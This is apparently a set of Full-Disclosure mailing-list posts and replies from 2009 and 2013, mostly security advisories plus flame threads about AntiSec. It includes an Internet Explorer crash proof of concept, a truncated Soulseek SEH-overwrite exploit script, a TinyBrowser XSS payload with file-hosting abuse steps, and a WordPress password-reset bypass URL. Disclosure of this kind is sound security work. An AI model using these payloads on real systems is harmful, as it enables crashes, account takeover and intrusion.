Re: [Full-disclosure] DoS vulnerability in Internet Explorer 6, 7, 8 (access violation)

[laurent gaffie]

I can't see any differences with the original advisory apart the 
tag with your website address.
What's the point at posting this on FD...?


2013/11/19 MustLive 

> Hello list!
>
> I want to warn you about Denial of Service vulnerability in Internet
> Explorer. This is access violation.
>
> This exploit is based on exploit by Asesino04 for IE7. As I've tested, it
> also works in IE6 and IE8.
>
> -
> Affected products:
> -
>
> Vulnerable are Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7
> (7.00.5730.13), Internet Explorer 8.0 (8.00.6001.18702) and previous
> versions of these browsers. IE 9, 10 and 11 were not tested, but
> potentially
> they can be vulnerable.
>
> --
> Details:
> --
>
> Denial of Service (WASC-10):
>
> Browser crashes at access by id to element of web page via method
> document.getElementById. At that in IE 6 and 7 the browser crashes, but in
> IE8 the tab is automatically restarting after error message (this
> functionality appeared in IE8).
>
> PoC / Exploit:
>
> 
> 
> Internet Explorer 6, 7 & 8 DoS Exploit.
> http://websecurity.com.ua
> 
> 
> 
> 
>  
> 
> 
> function over_trigger() {
> var obj_col = document.getElementById("132");
> obj_col.width = 42765;
> obj_col.span = 1000;
> }
> setTimeout("over_trigger()",1);
> 
> 
> 
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Soulseek 157 NS < 13e & 156.* Remote Direct Peer Search Code Execution

[laurent gaffie]

Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution
=
- Release date: July 02, 2009
- Discovered by: Laurent Gaffié ; http://g-laurent.blogspot.com/
- Severity: critical
=

I. VULNERABILITY
-
Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution

II. BACKGROUND
-
"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
sharing application.
One of the things that makes Soulseek(tm) unique is our community and
community-related features.
Based on peer-to-peer technology, virtual rooms allow you to meet people
with
the same interests, share information, and chat freely using real-time
messages
in public or private.
Soulseek(tm), with its built-in people matching system, is a great way to
make
new friends and expand your mind!"

III. DESCRIPTION
-
Soulseek client allows direct peer file search, allowing a user to find the
files he wants directly on the
peer computer.
Unfortunatly this feature is vulnerable to a remote SEH overwrite.

IV. PROOF OF CONCEPT
-
This proof of concept will target a user called 123yow123.

import struct
import sys, socket
from time import *

ip = "IP_ADDR"
port = "PORT_NUM" #You can find out, how to find out IP/PORT if you RTFM :)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
 s.connect((ip,port))
except:
 print "Can\'t connect to peer!\n"
 sys.exit(0)

junk = "\x41" * 3084
next_seh = struct.pack('http://slsknet.org/download.html)

VIII. REFERENCES
-
http://www.slsknet.org

IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com


X. REVISION HISTORY
-
july 02, 2009

XI. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII. PERSONAL NOTES

Souleek team as patched this bug month ago, a distributed message urging
users to upgrade them Soulseek client
is still send since a month, and not much users still use vulnerable
Soulseek versions.
@to the one who like to rip bugs and make an exploit ""universal"" for fame,
just make sure it's at least
universal before you say so.
For the others : http://www.youtube.com/watch?v=tVACUjHn6yU   :)

@RIIA : http://www.openp2p.com/pub/a/p2p/2002/12/11/piracy.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] A brief message on the topic of Anti-Sec

[laurent gaffie]

"Ok? Well, then have a nice day and
don't hold your breathe waiting for the OpenSSH 0day. 0pen0wn.c
(http://www.nopaste.com/p/aDTdT5s1C) was it!"

ya the hex encoded irc bot & rm -rf ? :)



2009/7/20 

> Hi,
>
> My name is DeadlyData. I enjoy long walks on the beach, getting
> pizzas delivered to my house when my d0x were dropped, and having
> anal sex with my buddy Sean/TD Debug. My 1337 hack group The
> Defaced (thedefaced.org) has been making threats and being homo-
> erotic on F-D. I'm sure you've seen the email from
> anti.sec.movem...@gmail.com that said "Please check out our website
> at: http://romeo.copyandpaste.info/"; Well, that is RoMeO's website
> (a TheDefaced admin!) dedicated to posing as a 1337 blackhat haqr.
> He's got cool things on there like portions of phrack zines, anti-
> sec ownages (that were done by the other anti-sec factions. You
> think we can hack? GOOD JOKE!!!), some zines from the olden days,
> and a speech by our buddy strayfe/n3w7yp3 (we love his dick, but we
> don't think he likes us ;( We lub you strayfe!). I just wanted to
> let you all know that our group has no 0days. Don't waste your time
> reading anti.sec.movem...@gmail.com's bullshit. Just worry about
> the other anti-sec factions. Ok? Well, then have a nice day and
> don't hold your breathe waiting for the OpenSSH 0day. 0pen0wn.c
> (http://www.nopaste.com/p/aDTdT5s1C) was it!
>
> Sincerely,
>  DeadlyData
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TinyBrowser (TinyMCE Editor File browser) 1.41.6 - Multiple Vulnerabilities

[laurent gaffie]

***this also affect any joomla! >1.5.*  ***


2009/7/28 YGN Ethical Hacker Group (http://yehg.net) 

>
> ==
>  TinyBrowser (TinyMCE Editor File browser) 1.41.6 - Multiple
> Vulnerabilities
>
> ==
>
> Discovered by
> Aung Khant, YGN Ethical Hacker Group, Myanmar
> http://yehg.net/ ~ believe in full disclosure
>
> Advisory URL:
>
> http://yehg.net/lab/pr0js/advisories/tinybrowser_1416_multiple_vulnerabilities(
> http://yehg.net/lab/#advisories)
> Date published: 2009-07-27
> Severity: High
> Vulnerability Class: Abuse of Functionality
> Affected Products:
> - TinyMCE editor with TinyBrowser plugin
> - Any web sites/web applications that use TinyMCE editor with TinyBrowser
> plugin
>
>
> Author: Bryn Jones (http://www.lunarvis.com)
> Author Contacted: Yes
> Reply: No reply
>
>
> Product Overview
> 
>
> TinyBrowser is a plugin of TinyMCE JavaScript editor that acts as
> file browser to view, upload, delete, rename files and folders on the
> web servers. TinyMCE is supposedly in wider use than its rival fckeditor
> due to faster loading and a little more cleaner interface. TinyMCE is
> mostly found in open-source web applications used as a textarea replacement
> html editor for allowing users to do text formatting with ease.
>
> Vulnerabilities
> ==
>
> #1. Default Insecure Configurations
>
> Configuration settings shipped with tinybrowser are relatively insecure by
> default. They allow attackers to view, upload, delete, rename files and
> folders
> under its predefined upload directory.
>
> Casual web developers or users might just upload the TinyMCE browser
> without
> doing any configurations or they might do it later.
> Meanwhile, if an attacker luckily finds the tinybrowser directory, which is
> by default
> jscripts/tiny_mce/plugins/tinybrowser, he can do harm or abuse because of
> insecure default configurations.
>
> This was once a vulnerability of fckeditor (http://fckeditor.net) which
> has fixed
> its hole - if you run fckeditor's file upload page the first time, you'll
> see
> "This connector is disabled. Please check the ". Tinybrowser should
> imitate
> like this.
>
>
> #2. Arbitrary Folder Creation
>
> Requesting the url [PATH]/tinybrowser.php?type=image&folder=hacked will
> create a folder named "hacked" in /useruploads/images/ directory if that
> folder does not exist.
>
>
> #3. Arbitrary File Hosting
>
> File: config_tinybrowser.php
> Code:
> // File upload size limit (0 is unlimited)
> $tinybrowser['maxsize']['image'] = 0; // Image file maximum size
> $tinybrowser['maxsize']['media'] = 0; // Media file maximum size
> $tinybrowser['maxsize']['file']  = 0; // Other file maximum size
> $tinybrowser['prohibited'] =
> array('php','php3','php4','php5','phtml','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','dll','reg','cgi',
> 'sh', 'py','asa','asax','config','com','inc');
> // Prohibited file extensions
>
> The max allowable upload is not restricted. So it will depend only on web
> server's default setting or
> PHP timeout value. There are not many restricted file types. Here's a way
> to abuse:
> - Create a hidden directory by requesting
> [PATH]/upload.php?type=file&folder=.hostmyfiles
> - Then go to /upload.php?type=file&folder=.hostmyfiles
> - Host your sound, movie, pictures, zipped archives or even your sample
> HTML web sites for FREE!
>
> An evil trick to create seemingly interesting folder such as secret and
> host a
> browser-exploit html page that triggers drive-by-download trojan.
> When web master browses that folder and clicks the exploit file, then he
> gets owned.
>
> #4. Cross-site Scripting
>
> Most GET/POST variables are not sanitized.
>
> File: upload.php
> Code:
> $goodqty = (isset($_GET['goodfiles']) ? $_GET['goodfiles'] : 0);
> $badqty = (isset($_GET['badfiles']) ? $_GET['badfiles'] : 0);
> $dupqty = (isset($_GET['dupfiles']) ? $_GET['dupfiles'] : 0);
>
> Exploit: upload.php?badfiles=1">alert(/XSS/)
>
> #5. Cross-site Request Forgeries
>
> All major actions such as create, delete, rename files/folders are GET/POST
> XSRF-able.
>
>
> #
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] AntiSec Lamers Exposed

[laurent gaffie]

Hi there,

First of all i dont care about antisec, antisex, anti-sec, n3td3v trolls,
and anti-se*
But i'll be speaking only about FACTS :

You have to prove by A+B, that this man {who ever he is} was really behind
his computer while this crime was done, and that his computer wasn't
compromised by someone, and this is a real pain in the ass to prove. that's
why so many cyber-criminals can escape so easily from justice.

Your only chance would be, in this case would be to have a scared personne
confessing  his crime under pressure, unless that, good luck you need more
than a whois and some logs.

Regards





2009/7/28 antisec exposed 

> Hmm, he thinks he is untouchable because he cant think of any hackers in
> Saudi being arrested. Also he thinks his ip doesn't matter cause he may have
> used a proxy in his hacking. Well I suppose taking credit for it over and
> over and over like it is your life's achievement doesn't matter eh?
>
> Let's face it antisec, you are LAME. No one gives a shit about your cause.
> The only noteworthy hack you have done is imageshack which will also be your
> undoing. Let;s do a lil recap of your so great achievements.
>
> -astalavista.com - lame spammy site with dead forum, who gives a shit? And
> secondly who even took them seriously in the first place? No one. That's
> who.
> -ssanz - Who the fuck is ssanz? Some kid running a server management
> company from his laptop? Who the hell even heard of him much less took his
> site and services seriously? Wow, you sure have changed the world with this
> hack, how dare some 15 year old kid advertise secure server management. You
> really taught the rest of us a lesson.
> -secureservertech - jesus fucking christ, has anyone even seen this site? A
> shitty no name hosting company with a shitty template monster template
> offering secure web hosting. You got to be kidding me, yet another company
> no one has heard of much less take anything they say seriously. What another
> great achievement there, you really are changing things, Gee the entire
> internet depended on them for secure web hosting. /sarcasm
> -infosec.org.uk - yet another no name security site/security expert no one
> gives a shit about.
>
> All of your fine select targets shows you are just a bunch of kiddies who
> happened to get a a few good exploits which you no doubt did not write. If
> you really wanted to "teach us all a lesson" and punish anyone who dare
> advocates security why not go after someone we have all actually heard of?
> like securityfocus, synmatec, etc? Im sure everyone knows the answer - you
> just simply arent able to.
>
> Kids like you pop up ever few years and get swatted down like the lil flies
> you are. Within a month I guarantee you and your hrdev buddies will be
> arrested. Keep on thinking you are untouchable, you are not.
>
> -- *How Strong is Your Score? *
> Click 
> hereto
>  see yours for $0!
> By 
> FreeCreditReport.com
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] AntiSec Lamers Exposed

[laurent gaffie]

"> First of all i dont care about antisec, antisex, anti-sec, n3td3v trolls,
> and anti-se*"

What's you dont understand in this ?
i dont freakin care about you, you're a waste of time.




2009/7/28 andrew.wallace 

Hi there,
>
> Stop bringing my name into this or face legal action, understood?
>
>
> http://news.cnet.com/8618-27080_3-10295688.html?communityId=2134&targetCommunityId=2134&blogId=245&messageId=8219055&tag=mncol;tback
>
> Thanks for understanding,
>
> Andrew
>
> On Wed, Jul 29, 2009 at 12:06 AM, laurent
> gaffie wrote:
> > Hi there,
> >
> > First of all i dont care about antisec, antisex, anti-sec, n3td3v trolls,
> > and anti-se*
> > But i'll be speaking only about FACTS :
> >
> > You have to prove by A+B, that this man {who ever he is} was really
> behind
> > his computer while this crime was done, and that his computer wasn't
> > compromised by someone, and this is a real pain in the ass to prove.
> that's
> > why so many cyber-criminals can escape so easily from justice.
> >
> > Your only chance would be, in this case would be to have a scared
> personne
> > confessing  his crime under pressure, unless that, good luck you need
> more
> > than a whois and some logs.
> >
> > Regards
> >
> >
> >
> >
> >
> > 2009/7/28 antisec exposed 
> >>
> >> Hmm, he thinks he is untouchable because he cant think of any hackers in
> >> Saudi being arrested. Also he thinks his ip doesn't matter cause he may
> have
> >> used a proxy in his hacking. Well I suppose taking credit for it over
> and
> >> over and over like it is your life's achievement doesn't matter eh?
> >>
> >> Let's face it antisec, you are LAME. No one gives a shit about your
> cause.
> >> The only noteworthy hack you have done is imageshack which will also be
> your
> >> undoing. Let;s do a lil recap of your so great achievements.
> >>
> >> -astalavista.com - lame spammy site with dead forum, who gives a shit?
> And
> >> secondly who even took them seriously in the first place? No one. That's
> >> who.
> >> -ssanz - Who the fuck is ssanz? Some kid running a server management
> >> company from his laptop? Who the hell even heard of him much less took
> his
> >> site and services seriously? Wow, you sure have changed the world with
> this
> >> hack, how dare some 15 year old kid advertise secure server management.
> You
> >> really taught the rest of us a lesson.
> >> -secureservertech - jesus fucking christ, has anyone even seen this
> site?
> >> A shitty no name hosting company with a shitty template monster template
> >> offering secure web hosting. You got to be kidding me, yet another
> company
> >> no one has heard of much less take anything they say seriously. What
> another
> >> great achievement there, you really are changing things, Gee the entire
> >> internet depended on them for secure web hosting. /sarcasm
> >> -infosec.org.uk - yet another no name security site/security expert no
> one
> >> gives a shit about.
> >>
> >> All of your fine select targets shows you are just a bunch of kiddies
> who
> >> happened to get a a few good exploits which you no doubt did not write.
> If
> >> you really wanted to "teach us all a lesson" and punish anyone who dare
> >> advocates security why not go after someone we have all actually heard
> of?
> >> like securityfocus, synmatec, etc? Im sure everyone knows the answer -
> you
> >> just simply arent able to.
> >>
> >> Kids like you pop up ever few years and get swatted down like the lil
> >> flies you are. Within a month I guarantee you and your hrdev buddies
> will be
> >> arrested. Keep on thinking you are untouchable, you are not.
> >>
> >> --
> >> How Strong is Your Score?
> >> Click here to see yours for $0!
> >> By FreeCreditReport.com
> >> ___
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

[laurent gaffie]

=
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
=

I. VULNERABILITY
-
WordPress <= 2.8.3 Remote admin reset password

II. BACKGROUND
-
WordPress is a state-of-the-art publishing platform with a focus on
aesthetics, web standards, and usability.
WordPress is both free and priceless at the same time.
More simply, WordPress is what you use when you want to work with your
blogging software, not fight it.

III. DESCRIPTION
-
The way Wordpress handle a password reset looks like this:
You submit your email adress or username via this form
/wp-login.php?action=lostpassword ;
Wordpress send you a reset confirmation like that via email:

"
Someone has asked to reset the password for the following site and username.
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just ignore
this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
"

You click on the link, and then Wordpress reset your admin password, and
sends you over another email with your new credentials.

Let's see how it works:


wp-login.php:
...[snip]
line 186:
function reset_password($key) {
global $wpdb;

$key = preg_replace('/[^a-z0-9]/i', '', $key);

if ( empty( $key ) )
return new WP_Error('invalid_key', __('Invalid key'));

$user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE
user_activation_key = %s", $key));
if ( empty( $user ) )
return new WP_Error('invalid_key', __('Invalid key'));
...[snip]
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();

if ( isset($_GET['key']) )
$action = 'resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword',
'resetpass', 'rp', 'register', 'login')) && false ===
has_filter('login_form_' . $action) )
$action = 'login';
...[snip]

line 370:

break;

case 'resetpass' :
case 'rp' :
$errors = reset_password($_GET['key']);

if ( ! is_wp_error($errors) ) {
wp_redirect('wp-login.php?checkemail=newpass');
exit();
}

wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
exit();

break;
...[snip ]...

You can abuse the password reset function, and bypass the first step and
then reset the admin password by submiting an array to the $key variable.


IV. PROOF OF CONCEPT
-
A web browser is sufficiant to reproduce this Proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
The password will be reset without any confirmation.

V. BUSINESS IMPACT
-
An attacker could exploit this vulnerability to compromise the admin account
of any wordpress/wordpress-mu <= 2.8.3

VI. SYSTEMS AFFECTED
-
All

VII. SOLUTION
-
No patch aviable for the moment.

VIII. REFERENCES
-
http://www.wordpress.org

IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
I'd like to shoot some greetz to securityreason.com for them great research
on PHP, as for this under-estimated vulnerability discovered by Maksymilian
Arciemowicz :
http://securityreason.com/achievement_securityalert/38

X. REVISION HISTORY
-
August 10th, 2009: Initial release

XI. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

[laurent gaffie]

Errata:

"V. BUSINESS IMPACT
-
An attacker could exploit this vulnerability to compromise the admin account
of any wordpress/wordpress-mu <= 2.8.3"

-->

"V. BUSINESS IMPACT
-
An attacker could exploit this vulnerability to reset the admin account of
any wordpress/wordpress-mu <= 2.8.3"


Regards Laurent Gaffié


2009/8/10 laurent gaffie 

> =
> - Release date: August 10th, 2009
> - Discovered by: Laurent Gaffié
> - Severity: Medium
> =
>
> I. VULNERABILITY
> -
> WordPress <= 2.8.3 Remote admin reset password
>
> II. BACKGROUND
> -
> WordPress is a state-of-the-art publishing platform with a focus on
> aesthetics, web standards, and usability.
> WordPress is both free and priceless at the same time.
> More simply, WordPress is what you use when you want to work with your
> blogging software, not fight it.
>
> III. DESCRIPTION
> -
> The way Wordpress handle a password reset looks like this:
> You submit your email adress or username via this form
> /wp-login.php?action=lostpassword ;
> Wordpress send you a reset confirmation like that via email:
>
> "
> Someone has asked to reset the password for the following site and
> username.
> http://DOMAIN_NAME.TLD/wordpress
> Username: admin
> To reset your password visit the following address, otherwise just ignore
> this email and nothing will happen
>
>
> http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
> "
>
> You click on the link, and then Wordpress reset your admin password, and
> sends you over another email with your new credentials.
>
> Let's see how it works:
>
>
> wp-login.php:
> ...[snip]
> line 186:
> function reset_password($key) {
> global $wpdb;
>
> $key = preg_replace('/[^a-z0-9]/i', '', $key);
>
> if ( empty( $key ) )
> return new WP_Error('invalid_key', __('Invalid key'));
>
> $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE
> user_activation_key = %s", $key));
> if ( empty( $user ) )
> return new WP_Error('invalid_key', __('Invalid key'));
> ...[snip]
> line 276:
> $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
> $errors = new WP_Error();
>
> if ( isset($_GET['key']) )
> $action = 'resetpass';
>
> // validate action so as to default to the login screen
> if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword',
> 'resetpass', 'rp', 'register', 'login')) && false ===
> has_filter('login_form_' . $action) )
> $action = 'login';
> ...[snip]
>
> line 370:
>
> break;
>
> case 'resetpass' :
> case 'rp' :
> $errors = reset_password($_GET['key']);
>
> if ( ! is_wp_error($errors) ) {
> wp_redirect('wp-login.php?checkemail=newpass');
> exit();
> }
>
> wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
> exit();
>
> break;
> ...[snip ]...
>
> You can abuse the password reset function, and bypass the first step and
> then reset the admin password by submiting an array to the $key variable.
>
>
> IV. PROOF OF CONCEPT
> -
> A web browser is sufficiant to reproduce this Proof of concept:
> http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=<http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
> The password will be reset without any confirmation.
>
> V. BUSINESS IMPACT
> -
> An attacker could exploit this vulnerability to compromise the admin
> account of any wordpress/wordpress-mu <= 2.8.3
>
> VI. SYSTEMS AFFECTED
> -
> All
>
> VII. SOLUTION
> -
> No patch aviable for the moment.
>
> VIII. REFERENCES
> -
> http://www.wordpress.org
>
> IX. CREDITS
> -
> This vulnerability has been discovered by Laurent Gaffié
> Laurent.gaffie{remove-this}(at)gmail.com
> I'd like to shoot some greetz to securityreason.com for them great
> research on PHP, as for this under-estimated vulnerability discovered by
> Maksymilian Arciemowicz :
> http://securityreason.com/achievement_securityalert/38
>
> X. REVISION HISTORY
> -
> August 10th, 2009: Initial release
>
> XI. LEGAL NOTICES
> -
> The information contained within this advisory is supplied "as-is"
> with no warranties or guarantees of fitness of use or otherwise.
> I accept no responsibility for any damage caused by the use or
> misuse of this information.
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

[laurent gaffie]

Hi there,

This wasn't tested on the 2.7* branch.
It as been tested on the  2.8.* branch, with php 5.3.0 & php 5.2.9 as an
Apache 2.2.12 module, on a linux env.


Regards Laurent Gaffié



2009/8/10 Nicolas Valcárcel Scerpella 

> I don't see the issue with wp 2.7.1
>
> On Mon, 10 Aug 2009, laurent gaffie wrote:
>
> > Errata:
> >
> > "V. BUSINESS IMPACT
> > -
> > An attacker could exploit this vulnerability to compromise the admin
> account
> > of any wordpress/wordpress-mu <= 2.8.3"
> >
> > -->
> >
> > "V. BUSINESS IMPACT
> > -
> > An attacker could exploit this vulnerability to reset the admin account
> of
> > any wordpress/wordpress-mu <= 2.8.3"
> >
> >
> > Regards Laurent Gaffié
> >
> >
> > 2009/8/10 laurent gaffie 
> >
> > > =
> > > - Release date: August 10th, 2009
> > > - Discovered by: Laurent Gaffié
> > > - Severity: Medium
> > > =
> > >
> > > I. VULNERABILITY
> > > -
> > > WordPress <= 2.8.3 Remote admin reset password
> > >
> > > II. BACKGROUND
> > > -
> > > WordPress is a state-of-the-art publishing platform with a focus on
> > > aesthetics, web standards, and usability.
> > > WordPress is both free and priceless at the same time.
> > > More simply, WordPress is what you use when you want to work with your
> > > blogging software, not fight it.
> > >
> > > III. DESCRIPTION
> > > -
> > > The way Wordpress handle a password reset looks like this:
> > > You submit your email adress or username via this form
> > > /wp-login.php?action=lostpassword ;
> > > Wordpress send you a reset confirmation like that via email:
> > >
> > > "
> > > Someone has asked to reset the password for the following site and
> > > username.
> > > http://DOMAIN_NAME.TLD/wordpress
> > > Username: admin
> > > To reset your password visit the following address, otherwise just
> ignore
> > > this email and nothing will happen
> > >
> > >
> > >
> http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
> > > "
> > >
> > > You click on the link, and then Wordpress reset your admin password,
> and
> > > sends you over another email with your new credentials.
> > >
> > > Let's see how it works:
> > >
> > >
> > > wp-login.php:
> > > ...[snip]
> > > line 186:
> > > function reset_password($key) {
> > > global $wpdb;
> > >
> > > $key = preg_replace('/[^a-z0-9]/i', '', $key);
> > >
> > > if ( empty( $key ) )
> > > return new WP_Error('invalid_key', __('Invalid key'));
> > >
> > > $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users
> WHERE
> > > user_activation_key = %s", $key));
> > > if ( empty( $user ) )
> > > return new WP_Error('invalid_key', __('Invalid key'));
> > > ...[snip]
> > > line 276:
> > > $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
> > > $errors = new WP_Error();
> > >
> > > if ( isset($_GET['key']) )
> > > $action = 'resetpass';
> > >
> > > // validate action so as to default to the login screen
> > > if ( !in_array($action, array('logout', 'lostpassword',
> 'retrievepassword',
> > > 'resetpass', 'rp', 'register', 'login')) && false ===
> > > has_filter('login_form_' . $action) )
> > > $action = 'login';
> > > ...[snip]
> > >
> > > line 370:
> > >
> > > break;
> > >
> > > case 'resetpass' :
> > > case 'rp' :
> > > $errors = reset_password($_GET['key']);
> > >
> > > if ( ! is_wp_error($errors) ) {
> > > wp_redirect('wp-login.php?checkemail=newpass');
> > > exit();
> > > }
> > >
> > > wp_redirect('wp-login.php?action=lo

Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

[laurent gaffie]

Oh ok.
Then, let's avoid that function.
If it's useless to have a function who validate a reset passwd before
resetting it, let's just avoid it smartass.


2009/8/10 Fabio N Sarmento [ Gmail ] 

There is no risk on this.
> It's just a little flaw, it doesn't broke anything or put your admin access
> in risk.
>
> :-P to me , this vulnerability is more "BUZZ" then real deal. LOL
>
>
> 2009/8/10 laurent gaffie 
>
>> Hi there,
>>
>> This wasn't tested on the 2.7* branch.
>> It as been tested on the  2.8.* branch, with php 5.3.0 & php 5.2.9 as an
>> Apache 2.2.12 module, on a linux env.
>>
>>
>> Regards Laurent Gaffié
>>
>>
>>
>> 2009/8/10 Nicolas Valcárcel Scerpella 
>>
>>> I don't see the issue with wp 2.7.1
>>>
>>> On Mon, 10 Aug 2009, laurent gaffie wrote:
>>>
>>> > Errata:
>>> >
>>> > "V. BUSINESS IMPACT
>>> > -
>>> > An attacker could exploit this vulnerability to compromise the admin
>>> account
>>> > of any wordpress/wordpress-mu <= 2.8.3"
>>> >
>>> > -->
>>> >
>>> > "V. BUSINESS IMPACT
>>> > -
>>> > An attacker could exploit this vulnerability to reset the admin account
>>> of
>>> > any wordpress/wordpress-mu <= 2.8.3"
>>> >
>>> >
>>> > Regards Laurent Gaffié
>>> >
>>> >
>>> > 2009/8/10 laurent gaffie 
>>> >
>>> > > =
>>> > > - Release date: August 10th, 2009
>>> > > - Discovered by: Laurent Gaffié
>>> > > - Severity: Medium
>>> > > =
>>> > >
>>> > > I. VULNERABILITY
>>> > > -
>>> > > WordPress <= 2.8.3 Remote admin reset password
>>> > >
>>> > > II. BACKGROUND
>>> > > -
>>> > > WordPress is a state-of-the-art publishing platform with a focus on
>>> > > aesthetics, web standards, and usability.
>>> > > WordPress is both free and priceless at the same time.
>>> > > More simply, WordPress is what you use when you want to work with
>>> your
>>> > > blogging software, not fight it.
>>> > >
>>> > > III. DESCRIPTION
>>> > > -
>>> > > The way Wordpress handle a password reset looks like this:
>>> > > You submit your email adress or username via this form
>>> > > /wp-login.php?action=lostpassword ;
>>> > > Wordpress send you a reset confirmation like that via email:
>>> > >
>>> > > "
>>> > > Someone has asked to reset the password for the following site and
>>> > > username.
>>> > > http://DOMAIN_NAME.TLD/wordpress
>>> > > Username: admin
>>> > > To reset your password visit the following address, otherwise just
>>> ignore
>>> > > this email and nothing will happen
>>> > >
>>> > >
>>> > >
>>> http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
>>> > > "
>>> > >
>>> > > You click on the link, and then Wordpress reset your admin password,
>>> and
>>> > > sends you over another email with your new credentials.
>>> > >
>>> > > Let's see how it works:
>>> > >
>>> > >
>>> > > wp-login.php:
>>> > > ...[snip]
>>> > > line 186:
>>> > > function reset_password($key) {
>>> > > global $wpdb;
>>> > >
>>> > > $key = preg_replace('/[^a-z0-9]/i', '', $key);
>>> > >
>>> > > if ( empty( $key ) )
>>> > > return new WP_Error('invalid_key', __('Invalid key'));
>>> > >
>>> > > $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users
>>> WHERE
>>> > > user_activation_key = %s", $key));
>>> > > if ( empty( $user ) )
>>> > > return new WP_Error('invalid_key', __('Invalid key'));
>>>

Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

[laurent gaffie]

Well, i dont think so, that's why i published this.
It very limitated.
It's true, someone can make a loop script and avoid any possibility to log
back on your wordpress blog, but you also can avoid that functionality
easily, you just need to comment out 1 line.
Anyways, a patch should come out soon.

Regards Laurent Gaffié




2009/8/10 ehmo 

> Very nice Laurent. That will hurt many ppl
>
> laurent wrote,
> > =
> > - Release date: August 10th, 2009
> > - Discovered by: Laurent Gaffié
> > - Severity: Medium
> > =
>
> > I. VULNERABILITY
> > -
> > WordPress <= 2.8.3 Remote admin reset password
>
> > II. BACKGROUND
> > -
> > WordPress is a state-of-the-art publishing platform with a focus on
> > aesthetics, web standards, and usability.
> > WordPress is both free and priceless at the same time.
> > More simply, WordPress is what you use when you want to work with your
> > blogging software, not fight it.
>
> > III. DESCRIPTION
> > -
